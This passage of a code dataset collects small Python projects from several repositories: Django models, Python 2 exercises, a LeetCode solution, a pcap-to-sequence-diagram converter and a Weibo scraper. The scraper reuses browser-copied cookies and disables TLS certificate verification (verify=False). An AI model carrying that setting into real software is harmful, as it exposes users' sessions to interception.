will always return the same value.
>>> @singleton
>>> class SingletonExample:
>>> def __init__(self):
>>> self.own_id: int = id(self)
>>> def __repr__(self):
>>> return f"{self.__class__.__name__}(id={self.own_id})"
>>>
>>> SingletonExample()
SingletonExample(id=140472046362688)
>>> SingletonExample()
SingletonExample(id=140472046362688)
>>> SingletonExample() is SingletonExample()
True
"""
instances = {}
def wrapper(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return wrapper
@singleton
class SingletonExample:
"""
SingletonExample
A class that stores a value of its id.
"""
def __init__(self):
self.own_id: int = id(self)
def __repr__(self):
return f"{self.__class__.__name__}(id={self.own_id})"
``` |
{
"source": "jonathadv/python-project-sample",
"score": 4
} |
#### File: python-project-sample/my_module/__init__.py
```python
from typing import Union
def my_sum(x: Union[int, float], y: Union[int, float]):
"""This function adds two numbers"""
return x + y
def my_division(x: Union[int, float], y: Union[int, float]):
"""This function divides one number by another"""
return x / y
``` |
{
"source": "Jonathan1214/DC_go",
"score": 3
} |
#### File: mysite__/index/models.py
```python
from django.db import models
# Create your models here.
class Class(models.Model):
id = models.AutoField(primary_key=True)
cname = models.CharField(max_length=32)
class Teacher(models.Model):
id = models.AutoField(primary_key=True)
tname = models.CharField(max_length=32)
cid = models.ManyToManyField(Class, name="teacher")
    # `name` is used for forward queries
    # `related_name` is used for reverse queries
    # For example:
    # Suppose the two tables are already linked, with c1 in Class and t1 in Teacher.
    # Forward query: if `name` is not set, query with t1.cid; otherwise use t1.<name>.
    # Reverse query: if `related_name` is not set, query with c1.teacher_set; otherwise use c1.<related_name>.
    # Note a very deceptive pitfall: when the two objects have only just been created they are not yet
    # linked, yet c1.teacher_set still returns an object at that point.
    # (Why is that?)
    # However, c1.teacher_set.all() is empty then; only after c1.teacher_set.add(t1) does
    # c1.teacher_set.all() return the correct result.
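    # Illustration of the two directions (names assumed for the example, not from the project):
    #   t1.teacher.add(c1)       # link via the forward manager exposed by name="teacher"
    #   t1.teacher.all()         # forward query: Teacher -> Class
    #   c1.teacher_set.all()     # reverse query: Class -> Teacher, default <model>_set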
class Person(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Group(models.Model):
name = models.CharField(max_length=128)
members = models.ManyToManyField(
Person,
through='Membership',
through_fields=('group', 'person'),
)
def __str__(self):
return self.name
class Membership(models.Model):
group = models.ForeignKey(Group, on_delete=models.CASCADE)
person = models.ForeignKey(Person, on_delete=models.CASCADE)
inviter = models.ForeignKey(
Person,
on_delete=models.CASCADE,
related_name="membership_invites",
)
invite_reason = models.CharField(max_length=64)
class MyUser(models.Model):
account = models.CharField(max_length=10)
pwd = models.CharField(max_length=100)
class IMG(models.Model):
img = models.ImageField(upload_to='img')
name = models.CharField(max_length=20, null=True)
arthor = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=True)
    # each image has an author; the upload time should probably be stored as well
up_load_time = models.DateTimeField(null=True)
    # When creating a Django model, the DateTimeField, DateField and TimeField types can be used for date fields;
    # their values correspond to datetime(), date() and time() objects respectively. All three fields share the parameters auto_now and auto_now_add,
``` |
{
"source": "Jonathan1214/learn-python",
"score": 4
} |
#### File: BasicExerciseAndKnowledge/w3cschool/n14_split_to_PrimeNumber.py
```python
def is_prime(num):
'''
    Determine whether num is prime.
'''
for i in range(2, num/2+1):
if num % i == 0:
return False
return True
def find_factor(num):
'''
    Find the factors of num, ignoring 1 and num itself.
'''
lt = []
for i in range(2, num/2+1):
if num % i == 0:
lt.append(i)
return lt
def split_to_PrimeList(num):
'''
    If num is a composite number, return its prime factorization as a list, e.g. 90 is split into 2 3 3 5.
    If num is prime, return None.
'''
    try:  # if num is prime, lt will be empty and an IndexError is raised
        lt = find_factor(num)  # temporary storage for num's factors
        # if not lt:
        # return lt
        factor_lt = []  # stores the prime factors
        factor_lt.append(lt[0])  # the first element of lt is necessarily prime
        factor_lt.append(lt[-1])  # the product of the first and last factors is the number itself
        while not is_prime(factor_lt[-1]):  # while the last (largest) entry in the list is not prime
lt = find_factor(factor_lt[-1])
factor_lt[-1] = lt[0]
factor_lt.append(lt[-1])
return factor_lt
except IndexError:
return None
def print_PrimeFactors(lt, num):
if lt:
print '\n'
i = 1
for item in lt:
if i != len(lt):
print '%d *' % item,
else:
print '%d = %d' % (item, num),
i += 1
else:
print '\n%d不是素数' % num
if __name__ == '__main__':
# num = int(raw_input('请输入一个合数:'))
# print_Prime(split_to_PrimeList(num), num)
for num in range(1,1000):
print_PrimeFactors(split_to_PrimeList(num), num)
```
#### File: BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py
```python
def factorial(num):
if num in (0,1):
return 1
return factorial(num-1) * num
print(factorial(5))
```
#### File: BasicExerciseAndKnowledge/w3cschool/n51_bitwise_and.py
```python
for i in range(10):
for j in range(10):
if i & j:
print '%d & %d = %d' % (i, j, i&j)
def convert_to_2base(num):
'''
    Convert a positive integer to its binary representation
    and return it as a string.
'''
def helper(num):
while num / 2:
yield (num % 2)
num /= 2
yield 1
lt = list(helper(num))[::-1]
str_ = ''.join([str(item) for item in lt])
return str_
print int(convert_to_2base(10), 2)
```
#### File: BasicExerciseAndKnowledge/w3cschool/n67_swap_max_min.py
```python
lt = [32, 31, 43, 23]
print lt
def swap_max_and_first(list_):
max_ = list_[0]
index = 0
for i in range(len(list_)):
if max_ < list_[i]:
max_ = list_[i]
index = i
list_[0], list_[index] = list_[index], list_[0]
def swap_min_and_last(list_):
min_ = list_[0]
index = 0
for i in range(len(list_)):
if min_ > list_[i]:
min_ = list_[i]
index = i
list_[-1], list_[index] = list_[index], list_[-1]
swap_min_and_last(lt)
print lt
swap_max_and_first(lt)
print lt
``` |
{
"source": "Jonathan1214/myCollege",
"score": 2
} |
#### File: myCollege/DeepLearning/minist_loader.py
```python
import pickle
import gzip
import numpy as np
def load_data():
f = gzip.open('./data/', 'rb')
```
#### File: LeetCode/question2/solution.py
```python
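# `ListNode` is not defined in this file; the minimal definition below is an
# assumption matching LeetCode's usual linked-list node convention.
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next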
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
ll1, ll2 = l1, l2
node = ListNode(0)
head = node
carry = 0
while ll1 and ll2:
val = (ll1.val+ll2.val+carry) % 10
carry = (ll1.val+ll2.val+carry) // 10
node.next = ListNode(val)
node = node.next
ll1 = ll1.next
ll2 = ll2.next
if ll1:
node.next = ll1
elif ll2:
node.next = ll2
elif carry:
node.next = ListNode(carry)
return head.next
else:
return head.next
while node.next:
tmp = carry + node.next.val
node.next.val = tmp % 10
carry = tmp // 10
node = node.next
if carry:
node.next = ListNode(carry)
return head.next
# if __name__ == "__main__":
# l1 = ListNode(9)
# l1.next = ListNode(9)
# l2 = ListNode(1)
# s = Solution()
# rt = s.addTwoNumbers(l1,l2)
# while rt:
# print(rt.val)
# rt = rt.next
```
#### File: myCollege/WeiboSpider/HTMLDownloader.py
```python
import requests
class HTMLDownloader:
''' downloader '''
def __init__(self):
print('启动下载器,开启 Session:')
self.session = requests.Session()
def deal_with_copied_cookies_from_chrome(self, cookies_file_path):
        '''Convert a cookies string copied from the browser into a dict.
        param: the cookies file path'''
with open(cookies_file_path, 'r', encoding='utf-8') as f:
cookies = f.read()
cookie = cookies.split("; ")
cookies = {}
for c in cookie:
tmp = c.split("=")
cookies[tmp[0]]= tmp[1]
return cookies
def update_cookies(self, cookies):
self.session.cookies.update(cookies)
def get_a_page(self, url, cookies, headers):
        '''Fetch a single page.
        params: url [str], cookies [file path]'''
        self.update_cookies(self.deal_with_copied_cookies_from_chrome(cookies))  # update cookies
        # set verify = False
return self.session.get(url, headers=headers, verify=False)
``` |
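A minimal usage sketch for the downloader above. The URL, headers, and cookies file path are placeholders; a real run needs a valid browser-copied cookie string saved to the file:

```python
from HTMLDownloader import HTMLDownloader  # assumes the WeiboSpider directory is on the path

downloader = HTMLDownloader()
headers = {"User-Agent": "Mozilla/5.0"}  # assumed header, not taken from the project
response = downloader.get_a_page("https://weibo.cn/", "cookies.txt", headers)
print(response.status_code)
```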
{
"source": "Jonathan-1407/python-binary-tree",
"score": 3
} |
#### File: python-binary-tree/src/binarytree.py
```python
from __future__ import print_function
from os import getenv
from dotenv import load_dotenv
class Node:
def __init__(self, label, parent):
self.label = label
self.left = None
self.right = None
self.parent = parent
# get & set functions
def getLabel(self):
return self.label
def setLabel(self, label):
self.label = label
def getLeft(self):
return self.left
def setLeft(self, left):
self.left = left
def getRight(self):
return self.right
def setRight(self, right):
self.right = right
def getParent(self):
return self.parent
def setParent(self, parent):
self.parent = parent
class BinarySearchTree:
def __init__(self):
self.root = None
def insert(self, label):
new_node = Node(label.replace(';', '').replace('|', ','), None)
if self.empty():
self.root = new_node
else:
curr_node = self.root
while curr_node is not None:
parent_node = curr_node
if new_node.getLabel() < curr_node.getLabel():
curr_node = curr_node.getLeft()
else:
curr_node = curr_node.getRight()
if new_node.getLabel() < parent_node.getLabel():
parent_node.setLeft(new_node)
else:
parent_node.setRight(new_node)
new_node.setParent(parent_node)
def empty(self):
if self.root is None:
return True
return False
def __InOrderTraversal(self, curr_node):
nodeList = []
if curr_node is not None:
nodeList.insert(0, curr_node)
nodeList = nodeList + self.__InOrderTraversal(curr_node.getLeft())
nodeList = nodeList + self.__InOrderTraversal(curr_node.getRight())
return nodeList
def getRoot(self):
return self.root
def __isRightChildren(self, node):
if(node == node.getParent().getRight()):
return True
return False
def __reassignNodes(self, node, newChildren):
if(newChildren is not None):
newChildren.setParent(node.getParent())
if(node.getParent() is not None):
if(self.__isRightChildren(node)):
node.getParent().setRight(newChildren)
else:
node.getParent().setLeft(newChildren)
def traversalTree(self, traversalFunction=None, root=None):
if(traversalFunction is None):
return self.__InOrderTraversal(self.root)
else:
return traversalFunction(self.root)
def __str__(self):
list = self.__InOrderTraversal(self.root)
str = ""
for x in list:
str = str + " " + x.getLabel().__str__()
return str
def orderBy(node, key: int):
return node.split(',')[key]
def InPreOrder(curr_node):
nodeList = []
if curr_node is not None:
nodeList = nodeList + InPreOrder(curr_node.getLeft())
nodeList.insert(0, curr_node.getLabel())
nodeList = nodeList + InPreOrder(curr_node.getRight())
return nodeList
def getTreeData(tree, order: int):
sorted_tree: list = sorted(tree.traversalTree(InPreOrder, tree.root),
key=lambda node: orderBy(node, order - 1))
return sorted_tree
```
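A small sketch of the tree API above, using made-up records in the `field1|field2|field3` shape that `insert()` normalizes (dropping `;`, turning `|` into `,`) and that `getTreeData()` sorts on. The import path assumes the script is run from the project root:

```python
from src.binarytree import BinarySearchTree, getTreeData

tree = BinarySearchTree()
tree.insert("2021-002|Jane Roe|Medicine;")     # stored as "2021-002,Jane Roe,Medicine"
tree.insert("2021-001|John Doe|Engineering;")

# order=1 sorts by the first field (IDs), order=2 by the second (names)
for record in getTreeData(tree, 2):
    print(record)
```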
#### File: python-binary-tree/src/home.py
```python
from os import system, name, path, getcwd
from pathlib import Path
from time import time
from .inputdata import getInputData, viewGeneratedInputData
from .outputdata import getOutputData, viewOrderedOutputData
def makeDefaultDirs():
path_dir = "public/files/"
path = Path(path_dir)
path.mkdir(parents=True, exist_ok=True)
inputFile = Path(f"{path_dir}Input.txt")
outputFile = Path(f"{path_dir}Output.txt")
inputFile.touch(exist_ok=True)
outputFile.touch(exist_ok=True)
makeDefaultDirs()
def drawWelcome():
print("▒█▀▀█ ▒█▀▀█ ▒█▀▀▀█ ▒█▀▀█ ▒█▀▀█ ░█▀▀█ ▒█▀▄▀█ ░█▀▀█ ▒█▀▀█ ▀█▀ ▒█▀▀▀█ ▒█▄░▒█")
print("▒█▄▄█ ▒█▄▄▀ ▒█░░▒█ ▒█░▄▄ ▒█▄▄▀ ▒█▄▄█ ▒█▒█▒█ ▒█▄▄█ ▒█░░░ ▒█░ ▒█░░▒█ ▒█▒█▒█")
print("▒█░░░ ▒█░▒█ ▒█▄▄▄█ ▒█▄▄█ ▒█░▒█ ▒█░▒█ ▒█░░▒█ ▒█░▒█ ▒█▄▄█ ▄█▄ ▒█▄▄▄█ ▒█░░▀█")
print("")
def drawEndExcecution():
print("+-----------------------------------------+")
print("| |")
print("| \033[35m** Ejecucion Finalizada **\033[0m |")
print("| |")
print("+-----------------------------------------+")
def validateOption(message: str):
option = input(message)
return option
def clear():
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
clear()
drawWelcome()
def getFilePath(file_name: str, title: str = "Archivo Generado"):
dir_path = path.abspath(getcwd())
print(f'\033[92m\t === {title} ===\033[0m\n')
print(
'\tEl archivo se encuentra en: \n')
print(
f"\t\033[96m{dir_path}/public/files/{file_name}\033[0m\n")
def menu():
print("==== Bienvenid@ ====")
print("1 - Generar archivo con datos de entrada")
print("2 - Generar archivo de salida")
print("3 - Ver datos generados del archivo de entrada")
print("4 - Ver datos ordenados del archivo de salida")
print("5 - Salir")
def outputMenu():
print("\t==== Ordernar por? ====")
print("\t1 - Carnet")
print("\t2 - Nombres y apellidos")
print("\t3 - Carrera\n")
print('\t\tPresiona (\033[4menter\033[0m) para omitir')
option = validateOption(
"\tIngresa una opcion, por defecto \033[93mCarnet\033[0m: ")
return option
option_menu = 0
while True:
try:
menu()
option_menu = int(validateOption("Selecciona una opcion: "))
if option_menu == 1:
clear()
print('\tDeseas ingresar la cantidad de datos a generar?')
print('\t\tPresiona (\033[4menter\033[0m) para omitir')
length = validateOption(
"\tIngresa la cantidad de datos, por defecto \033[93m100\033[0m: ")
start_time = time()
if length != "":
getInputData(int(length))
else:
getInputData(100)
end_time = round((time() - start_time), 6)
clear()
getFilePath('Input.txt')
print(
'\n\tTiempo de ejecucion: \033[94m{}seg\033[0m\n'.format(end_time))
elif option_menu == 2:
clear()
output_option = outputMenu()
start_time = time()
if output_option != "":
getOutputData(int(output_option))
else:
getOutputData(1)
end_time = round((time() - start_time), 6)
clear()
getFilePath('Output.txt', 'Archivo Generado y Ordenado')
print(
'\n\tTiempo de ejecucion: \033[94m{}seg\033[0m\n'.format(end_time))
elif option_menu == 3:
clear()
viewGeneratedInputData()
elif option_menu == 4:
clear()
viewOrderedOutputData()
elif option_menu == 5:
clear()
drawEndExcecution()
break
else:
clear()
print("\n *** Opcion no valida ***\n")
except:
clear()
print("\033[91m** Ingresa un valor valido **\033[0m\n")
```
#### File: python-binary-tree/src/outputdata.py
```python
from .binarytree import BinarySearchTree, getTreeData
from os import getenv
from dotenv import load_dotenv
def viewOrderedOutputData():
file = open(getenv('FILE_OUTPUT_PATH'), 'r')
print(file.read())
file.close()
def getDataFile():
students = []
file = open(getenv('FILE_INPUT_PATH'), 'r')
file_total_lines = file.readlines()
for student in file_total_lines:
students.append(student.strip())
file.close()
return students
def getOutputData(order: int):
available_order = [1, 2, 3]
if order not in available_order:
order = 1
tree = BinarySearchTree()
students = getDataFile()
for student in students:
tree.insert(student)
if order == 3:
order += 1
students_tree: list = getTreeData(tree, order)
file = open(getenv('FILE_OUTPUT_PATH'), 'w')
for item in students_tree:
file.write(f"{item}\n")
file.close()
``` |
{
"source": "jonathan1929-cmis/jonathan1929-cmis-cs2",
"score": 4
} |
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/countup.py
```python
def main(n):
if n == 10:
print "Blastoff!"
elif n > 10:
print "Number needs to be 10 or under."
else:
print n
main(n + 1)
main(1)
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/SimpleProgram.py
```python
def calculation(age):
yearsleft=75-int(age)
return yearsleft
def storytelling(name,favmov,hobby,father,mother,yearsleft,crush,friend,vehicle):
print """------------------------------------------------------------
On a bright sunny day you, """ + str(name) +""", was walking down the street. You were thinking about """ + str(crush) + """ and felt {}. You were back from a day of {} at work. For a long time you wanted to become {}, but rethought your choice and decided to be {}. Considering you've only got {} numbers of years left to live, you don't really have a lot of time. While walking, you see {} across the street, and {} pulling over next to her in a {}. Only problem is, """.format(favmov,hobby,father,mother,yearsleft,crush,friend,vehicle) + str(friend) +""" has been dead for 5 years..."""
def main():
name=raw_input("What is your name?:")
age=raw_input("How old are you?:")
sex=raw_input("What is your sex?:")
hobby=raw_input("What do you enjoy doing in your free time?:")
drink=raw_input("What is your favorite drink?:")
vehicle=raw_input("What kind of vehicle would you like?:")
childhood=raw_input("What was your favorite childhood object?:")
crush=raw_input("What is the name of your crush?:")
father=raw_input("Father's occupation?(add a/an before):")
mother=raw_input("Mother's occupation?(add a/an before):")
    catch=raw_input("What is your favorite catchphrase?:")
friend=raw_input("Who is your best friend?:")
thrillride=raw_input("Describe the first thrill ride you ever got on:")
    oneself=raw_input("Describe yourself in one word:")
favmov=raw_input("What was your reaction to your favorite movie?:")
kill=raw_input("If you were confronted by a serial killer, how would you act?:")
yearsleft=calculation(age)
story=storytelling(name,favmov,hobby,father,mother,yearsleft,crush,friend,vehicle)
print story
main()
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/Test1.py
```python
import math
def circle_diameter(r):
pi = (math.pi)
return math.sqrt(r/pi)*2
def output(Area1,Area2,Area3,Total):
out = """Circle Diameter
c1 {}
c2 {}
c3 {}
total {}""".format(Area1, Area2, Area3, Total)
return out
def addvalues(D1,D2,D3):
value = D1 + D2 + D3
return value
def main():
Area1=int(raw_input("c1:"))
Area2=int(raw_input("c2:"))
Area3=int(raw_input("c3:"))
D1 = circle_diameter(Area1)
D2 = circle_diameter(Area2)
D3 = circle_diameter(Area3)
Total = addvalues(D1,D2,D3)
print output(Area1,Area2,Area3,Total)
main()
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/WHILE.py
```python
def count(x):
while x > 0:
print x
x -= 1
while x < 0:
print x
x += 1
#count(-10)
def countfrom(x, y):
if x <= y:
while x <= y:
print x
x += 1
elif x >= y:
while x >= y:
print x
x -= 1
#countfrom(0, 9)
#countfrom(10, 0)
def oddodds(x, stack):
if x <= 0:
while x <= 0:
if not x % 2 == 0:
stack += -x
x += 1
if x >= 0:
while x >= 0:
if not x % 2 == 0:
stack += x
x -= 1
print stack
#oddodds(10, 0)
#oddodds(20, 0)
def grid(w, h):
out = " "
out += "."*w
h -= 1
while h>0:
print out
h-=1
return out
print grid(20,5)
``` |
{
"source": "Jonathan2000s/Nuker-Termux-v1.0",
"score": 3
} |
#### File: Jonathan2000s/Nuker-Termux-v1.0/DarkSide.py
```python
print("[ > BOT BY: Jonathan < ] \n")
import os
import colorama
from colorama import Fore
import discord
import asyncio
from discord.ext import commands
intents = discord.Intents.default()
intents.members = True
###########SETUP###############
prefix = "!"
token = "<PASSWORD>"
spam_messages = "@everynoe"
massdm = "Nuke"
rolenames = "Nuker"
channels = "Nuker"
###############################
def Clear():
os.system('cls')
bot = commands.Bot(command_prefix = prefix)
bot.remove_command("help")
os.system('cls' if os.name == 'nt' else 'clear')
@bot.event
async def on_ready():
Clear()
print(f"""
{Fore.RED}
░░░░░░ ░░░░░ ░░░░░░ ░░ ░░ ░░░░░░░ ░░ ░░░░░░ ░░░░░░░
▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒
▒▒ ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒▒
▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓
██████ ██ ██ ██ ██ ██ ██ ███████ ██ ██████ ███████
[ คำสั่ง !nuke ]
""")
print("\033[1;31;40m_________________________________________________________")
print("BOT Is Online prefix = ! ")
#help commamd
@bot.command()
async def help(ctx):
await ctx.message.delete()
embed = discord.Embed(color=000000, timestamp=ctx.message.created_at)
embed.set_author(name="TERMINAL")
embed.add_field(name="`NUKE`", value="- destroys the server")
embed.add_field(name="`SPAM`", value="- spams the server")
embed.add_field(name="`BAN`", value="- bans all members in the server")
embed.add_field(name="`KICK`", value="- kicks all members in the server")
embed.add_field(name="`MASSDM`", value="- dms everyone in the server with the message provided")
embed.add_field(name="`SNAME`", value="- changes the server name!")
embed.add_field(name="`ROLES`", value="- deletes all roles in the server, and creates new ones")
embed.add_field(name="`DCHANNELS`", value="- deletes all channels in the server")
embed.add_field(name="`SCHANNELS`", value="- spams channels in the server")
embed.set_image(url="")
await ctx.send(embed=embed)
#commands
@bot.command()
async def spam(ctx):
guild = ctx.message.guild
await ctx.message.delete()
await ctx.send("`Bot is now spamming!`")
while True:
for channel in guild.text_channels:
await channel.send(spam)
#AC
@bot.command(pass_conext=True)
async def ban(ctx):
await ctx.message.delete()
guild = ctx.message.guild
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("``Banned all!``")
@bot.command(pass_conext=True)
async def kick(ctx):
await ctx.message.delete()
guild = ctx.message.guild
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print("User" +member.name + "Has Been Kicked")
except:
pass
await ctx.send("`Kicked all!`")
@bot.command(pass_context=True)
async def massdm(ctx):
guild = ctx.message.guild
for member in guild.members:
await asyncio.sleep(0)
try:
await member.send(massdm)
await ctx.send("`Message Has Been Sent`")
except:
pass
@bot.command(pass_context=True)
async def roles(ctx, amount):
guild = ctx.message.guild
for role in guild.roles:
try:
await role.delete()
print(f"Role: {role} has been deleted")
except:
pass
print(f"Role: {role} could not be deleted")
for i in range(amount):
try:
await guild.create_role(name=rolenames)
print("Role has been created")
except:
print("Role could not be created")
@bot.command(pass_context=True)
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.message.guild
#banning
print("ENTERING: Banning members")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("`Banned all!`")
#deleting channels
print("ENTERING: Deleting channels")
try:
for channel in ctx.guild.channels:
await channel.delete()
print("Channel deleted")
except:
pass
print("Channel could not be deleted")
#creating channels
print("ENTERING: Creating channels")
try:
for i in range(50):
guild = ctx.message.guild
await guild.create_text_channel(channels)
print("Channel created")
except:
pass
print("Channel could not be created")
#deleting roles
print("ENTERING: deleting roles")
for role in guild.roles:
try:
await role.delete()
print(f"Role: {role} has been deleted")
except:
pass
print(f"Role: {role} could not be deleted")
#creating role
print("ENTERING: creating roles")
for i in range(50):
try:
await guild.create_role(name=rolenames)
print("Role has been created")
except:
print("Role could not be created")
print("ENTERING: Spamming messages")
while True:
for channel in guild.text_channels:
await channel.send(spam_messages)
@bot.command()
async def Sname(ctx, msg=None):
if msg is not None:
await ctx.guild.edit(name=msg)
else:
await ctx.send('``what do you want me to change the server name to?``')
@bot.command()
async def dchannels(ctx):
for channel in ctx.guild.channels:
await channel.delete()
@bot.command(pass_context=True)
async def schannels(ctx):
await ctx.message.delete()
await ctx.send("`Creating channels...`")
guild = ctx.message.guild
for i in range(50):
await guild.create_text_channel(random.choice(channels))
for channel in list(ctx.message.guild.channels):
pass
bot.run(token)
``` |
{
"source": "Jonathan20021/ransomware",
"score": 2
} |
#### File: Jonathan20021/ransomware/ramsomware.py
```python
import os
import random
import hashlib
import socket
#to use these modules install pycryptodome
from Crypto.Util import Counter
from Crypto.Cipher import AES
username = os.getlogin()
#This only works for me, you must put the path where the ransomware will work on your machine.
#This is just an experiment, if you want to make it global use os.environ['HOME'] Be careful wiht that
destination = r'C:\Users\{}\desktop\proyectos_libres\ransonwre_dir'.format(username)
destination = os.path.abspath('')
files = os.listdir(destination)
files = [x for x in files if not x.startswith('.')]
#You can add any extensions
extensions = [".txt", ".jpg", '.jpeg', 'mp4', 'mp3', 'png',]
def hash_key():
hashnumber = destination + socket.gethostname() + str(random.randint(0, 10000000000000000000000000000000000000000000000))
hashnumber = hashnumber.encode('utf-8')
print(hashnumber)
hashnumber = hashlib.sha512(hashnumber)
hashnumber = hashnumber.hexdigest()
new_key = []
for k in hashnumber:
if len(new_key) == 32:
hashnumber = ''.join(new_key)
break
else:
new_key.append(k)
return hashnumber
def encrypt_and_decrypt(text, crypto, block_size = 16):
with open(text, 'r+b') as encrypted_file:
unencrypted_content = encrypted_file.read(block_size)
while unencrypted_content:
encrypted_content = crypto(unencrypted_content)
if len(unencrypted_content) != len(encrypted_content):
raise ValueError('')
encrypted_file.seek(- len(unencrypted_content), 1)
encrypted_file.write(encrypted_content)
unencrypted_content = encrypted_file.read(block_size)
def discover(key):
files_list = open('files_list', 'w+')
for extension in extensions:
for file in files:
if file.endswith(extension):
files_list.write(os.path.join(file)+ '\n')
files_list.close()
del_space = open('files_list', 'r')
del_space = del_space.read().split('\n')
print(del_space)
del_space = [i for i in del_space if not i == '']
print(del_space)
if os.path.exists('hash_file'):
decrypt_field = input('Enter the symmetric key: ')
hash_file = open('hash_file', 'r')
key = hash_file.read().split('\n')
key = ''.join(key)
if decrypt_field == key:
key = key.encode('utf-8')
counter = Counter.new(128)
crypto = AES.new(key, AES.MODE_CTR, counter = counter)
cryp_files = crypto.decrypt
for element in del_space:
encrypt_and_decrypt(element, cryp_files)
else:
counter = Counter.new(128)
crypto = AES.new(key, AES.MODE_CTR, counter = counter)
hash_file = open('hash_file', 'wb')
hash_file.write(key)
hash_file.close()
cryp_files = crypto.encrypt
for element in del_space:
encrypt_and_decrypt(element, cryp_files)
def main():
hashnumber = hash_key()
print(hashnumber)
print(len(hashnumber))
hashnumber = hashnumber.encode('utf-8')
discover(hashnumber)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit()
``` |
{
"source": "Jonathan2106/pcaptomsc",
"score": 2
} |
#### File: Jonathan2106/pcaptomsc/pcaptomsc.py
```python
import sys
import getopt
from tshark import tshark
import pcaptolist
import mscgenhandler
def replacestrings(text):
string_to_replace = [
["\"", "\\\""],
["→", "->"]
]
ret = text
for strings in string_to_replace:
ret = ret.replace(strings[0], strings[1])
return ret
def listtomscgenformat(list_of_el):
ret = ""
ret += "msc {\n\n"
list_of_actors = []
for el in list_of_el:
list_of_actors.append(el["source"])
list_of_actors.append(el["destination"])
# actors = list(set(list_of_actors)) -> can't maintain order
actors = list(dict.fromkeys(list_of_actors))
ret += " \"" + "\", \"".join(actors) + "\";\n"
for el in list_of_el:
# make it temporary
current_el = el
# concat the text
ret += (" \"" + current_el["source"]+ "\"=>\""+ current_el["destination"]
+ "\" [label=\"("+ current_el["protocol"] +") " + replacestrings(current_el["info"]) + "\"];\n")
ret += "}"
return ret
def listtosequencediagramformat(list_of_el):
ret = ""
for el in list_of_el:
# make it temporary
current_el = el
# replacing unreadable character
current_el["source"] = current_el["source"].replace(":", ".")
current_el["destination"] = current_el["destination"].replace(":", ".")
# concat the text
ret += (current_el["source"]+ " -> "+ current_el["destination"]
+ ": *"+ current_el["protocol"] + "*: " + current_el["info"] + "\n")
return ret
def listtohackmdformat(list_of_el):
ret = ""
ret += "```sequence\n"
# reuse the sequence diagram format
ret += listtosequencediagramformat(list_of_el)
# exit sequence of msc generator
ret += "```\n"
return ret
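# Illustrative example of the packet dicts these formatters expect (values made up):
#   packets = [{"source": "10.0.0.1", "destination": "10.0.0.2",
#               "protocol": "TCP", "info": "80 > 443 [SYN]"}]
# listtomscgenformat(packets) then yields roughly:
#   msc {
#    "10.0.0.1", "10.0.0.2";
#    "10.0.0.1"=>"10.0.0.2" [label="(TCP) 80 > 443 [SYN]"];
#   }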
def main(argv):
tshark_path = tshark.get_tshark_path()
if (tshark_path == 0):
print("tshark not found. Please install Wireshark.")
return 0
inputfile = ''
format = ""
txt_output = False
image_output = False
output_file = ''
try:
# opts is a list of returning key-value pairs, args is the options left after striped
# the short options 'hi:o:', if an option requires an input, it should be followed by a ":"
# the long options 'ifile=' is an option that requires an input, followed by a "="
opts, args = getopt.getopt(argv,"hi:o:f:",["ifile=","ofile=", "format="])
except getopt.GetoptError:
print("pcaptomsc.py -i <inputfile> -o <output_file>")
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print("pcaptomsc.py -i <inputfile> -o <output_file>")
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
if arg[-4:] == ".txt":
print("outputing to ", arg)
output_file = arg
txt_output = True
if arg.split('.')[-1] in ("png", "svg", "eps"):
if format == "mscgen":
image_output = True
image_output_file = arg
else:
print("image output must use mscgen as format parameter.\n")
print("please specify the format parameter before output parameter.\n")
elif opt in ("-f", "--format"):
if arg == "hackmd":
format = "hackmd"
if arg == "sequencediagram":
format = "sequencediagram"
if arg == "mscgen":
format = "mscgen"
## Process the input to list
packet_list = pcaptolist.pcaptolist(tshark_path, inputfile)
print("input has been read : ", inputfile)
## Process to output
if format == "":
format = "hackmd"
print("Format configuration not existed, default (hackmd Format) will be selected.")
if format == "hackmd":
output = listtohackmdformat(packet_list)
elif format == "sequencediagram":
output = listtosequencediagramformat(packet_list)
elif format == "mscgen":
output = listtomscgenformat(packet_list)
## output
if txt_output == True:
f = open(output_file, "wt", encoding='utf-8')
f.write(output)
f.close()
print("text file generated : ", output_file)
if image_output == True:
mscgen_output_file = image_output_file[:-4] + ".msc"
f = open(mscgen_output_file, "wt", encoding='utf-8')
f.write(output)
f.close()
print("mscgen file generated : ", mscgen_output_file)
if image_output == True:
image_format = image_output_file.split('.')[-1]
res = mscgenhandler.mscgenhandler(image_format, mscgen_output_file, image_output_file)
if res == 0:
print("image generated : ", image_output_file)
else:
print("failed to generate image.")
## print output on terminal
print("process finsihed.\n")
print("Printing output to terminal.\n\n")
print(output)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "Jonathan339/Asteroid",
"score": 3
} |
#### File: Jonathan339/Asteroid/bala.py
```python
class Bala:
    def __init__(self, image, x, y):
        self.image = image
        self.rect = self.image.get_rect(x=x, y=y)
```
